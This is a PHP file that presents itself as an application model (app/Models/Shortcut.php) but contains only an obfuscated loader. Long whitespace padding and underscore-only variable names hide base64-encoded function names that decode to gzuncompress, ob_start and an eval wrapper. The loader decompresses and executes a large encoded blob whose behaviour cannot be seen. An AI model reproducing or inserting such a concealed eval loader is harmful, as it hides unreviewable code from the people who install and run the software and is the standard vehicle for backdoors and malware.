<?php 
        $__='printf';$_='Loading app/Models/Shortcut.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
